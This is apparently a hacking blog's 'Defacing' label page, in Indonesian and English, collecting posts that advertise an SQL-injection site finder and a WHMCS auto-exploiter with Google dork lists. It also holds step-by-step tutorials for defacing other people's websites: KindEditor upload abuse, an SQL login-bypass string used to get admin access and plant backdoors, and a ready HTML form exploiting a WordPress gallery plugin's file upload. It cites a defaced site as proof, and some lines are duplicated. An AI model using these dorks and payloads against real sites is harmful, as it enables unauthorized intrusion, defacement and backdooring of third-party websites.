Tampilkan postingan dengan label Defacing. Tampilkan semua postingan

“SQLI Hunter” SQL Injection Hunter 1.0 dari namanya sudah jelas bahwa aplikasi ini berfungsi untuk mencari website yang rentan terhadap serangan SQL Injection. Dilengkapi 4493 Dorks, dan dalam sekali scan mendapatkan 96 hasil. Dilengkapi juga Pencari Login Page Admin.

DOWNLOAD DISINI (INSTALL VERSION – Butuh .NET Framework 3.5)
atau
DOWNLOAD DISINI (PORTABLE VERSION)
SQLI Hunter: SQL Injection Hunter | ~X~ M3X1MUZ ~X~
Kali ini kita akan share sebuah tools yang berguna untuk melakukan testing keamanan terhadap situs yang berbasis wordpress. Dimana hasil dari scan bisa dilihat berupa report dan dikirimkan ke email.
Berikut penampakannya:



aWPVSCAN adalah Android WordPress Vulnerability Scanner yaitu aplikasi android ditulis dalam ruby dibuat untuk menemukan kelemahan yang terdapat dalam website yang berbasis WordPress. Dimaksudkan menggunakannya untuk untuk profesional keamanan atau administrator WordPress untuk menilai seberapa besar keamanan website WordPress mereka.
* Tested on Samsung Galaxy Nexus, Jelly Bean 4.1.2
* Tested on Samsung Galaxy Nexus, Jelly Bean 4.1.2
Android WordPress Vulnerability Scanner | ~X~ M3X1MUZ ~X~
Berbagi tools untuk melakukan exploit terhadap WHMCS.
WHMCS adalah software untuk manajemen pelanggan, melakukan penagihan dan support terutama untuk keperluan webhosting, tetapi juga bisa untuk jenis bisnis online lainnya. WHMCS memungkinkan Anda untuk mengelola bisnis Anda menjadi lebih baik. dan WHMCS memungkinkan Anda untuk dengan mudah dan efektif mengelola bisnis Anda ketika mengotomatisasi tugas-tugas rutin banyak.

WHMCS 0-Day Auto Exploiter <= 5.2.8
Berikut ini adalah list untuk google search (google dork):
inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:”Powered by WHMCompleteSolution”
intext:”Powered by WHMCompleteSolution” inurl:clientarea.php
inurl:announcements.php intext:”WHMCompleteSolution”
intext:”Powered by WHMCS”
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:”Powered by WHMCompleteSolution”
intext:”Powered by WHMCompleteSolution” inurl:clientarea.php
inurl:announcements.php intext:”WHMCompleteSolution”
intext:”Powered by WHMCS”
Berikut ini ada beberapa exploit diantaranya didalam PHP, Phython.
Simpan file dengan nama WHMCS-Fucker.php atau WHMCS-Fucker.py:
Simpan file dengan nama WHMCS-Fucker.php atau WHMCS-Fucker.py:
Selamat mencoba dan menggunakan.. 

Salam,
WHMCS Ver 5.2.8 0Day Auto Exploiter | ~X~ M3X1MUZ ~X~
1. Masukan Dork Berikut ke kotak pencarian Google :
inurl:examples/uploadbutton.html
inurl:kindeditor
2. Pilih salah satu website yang ingin kalian Deface
3. Tambahkan exploit :
Exploitnya : /Kindeditor/examples/uploadbutton.html
http://site.com/exploit
http://site.com/exploit
site.com/Kindeditor/examples/uploadbutton.html
4. Setelah anda memilih website yang akan diDeface,maka akan keluar tampilan seperti ini :
4. Klik upload >> pilih Script deface agan dengan format (.html)
5. tunggu sampai keluar URL hasil upload-an HTML kita
6. Copas link tersebut dan letakkan diakhir URL
Contoh : site.com/link yang terdapat di kolom upload
7. Tara, Anda sudah berhasil Mendeface Dengan Method Kineditor ^_^
NB : Hasil Saya : http://www.designcss.org/public/jfk/source/kindeditor-4.0.5/attached/file/20170401/20170401204606_82135.html
Tutorial Deface Method Kindeditor Terbaru Dan Lengkap 2017-2018
Hi all?
now myregan will give you a tutorial deface, admin bypass method.
Okay just go ahead “Read, learn and practice”
Okay just go ahead “Read, learn and practice”
Dork, admin login:
inurl:/admin/login.php
Dork, image:
inurl:/admin/uploads/img
inurl:/admin/image
inurl:/admin/login.php
Dork, image:
inurl:/admin/uploads/img
inurl:/admin/image
try to develop again according to your instinct, lol.
search target using search engine then click one of the web.
in the login page section, fill in the username and password field with the code below:
‘=”or’
in the login page section, fill in the username and password field with the code below:
‘=”or’
Well, if the website is vuln you can login as admin.
Next step, make the back door.
do not know how to make the back door?
Generally the location of the back door is in:
=> add photos
=> add galery
=> add slider
=> add project
=> add banner
=> add product
=> add photos
=> add galery
=> add slider
=> add project
=> add banner
=> add product
another, you can look for it yourself.
how to access the back door?
I assume the process of making the back door has been successful, then right click the file => view image .
can also right-click the file => copy the image location = paste it in a new tab.
can also right-click the file => copy the image location = paste it in a new tab.
After that it’s up to you, what you want to do.
Good luck bro ^_^
~X~ M3X1MUZ ~X~
Deface With Bypass Admin terbaru 2018
Kali ini saya akan membuat artikel
2. Copy Script dibawah & Simpan di notepad berformat .html (Contoh : maqloegeming.html)
Ambil Disini : Pastebin.com
Atau Copas Disini
Tutorial Deface Dengan WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD
Tanpa basa-basi, yuk kita gass langsung ke point utamanya ^_^
Klik Gambar Agar Jelas
To The Point
Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (Gunakan otak wibu kalian biar makin fresh)
1. Dorking dulu dengan dork diatas lalu pilih Target kalian (Lihat Gambar)
Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (Gunakan otak wibu kalian biar makin fresh)
1. Dorking dulu dengan dork diatas lalu pilih Target kalian (Lihat Gambar)
2. Copy Script dibawah & Simpan di notepad berformat .html (Contoh : maqloegeming.html)
Ambil Disini : Pastebin.com
Atau Copas Disini
<form action="www.target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
- Step 1
- Step 2
- Step 3
- Step 4
- Step 5
- Step 6
- Step 7
- Step 8
Mudah kan xD
Jika Kurang Paham Dengan Tutorial Di Atas bisa bertanya dengan saya ^_^
Jika Kurang Paham Dengan Tutorial Di Atas bisa bertanya dengan saya ^_^
Salam,
~X~ M3X1MUZ ~X~


























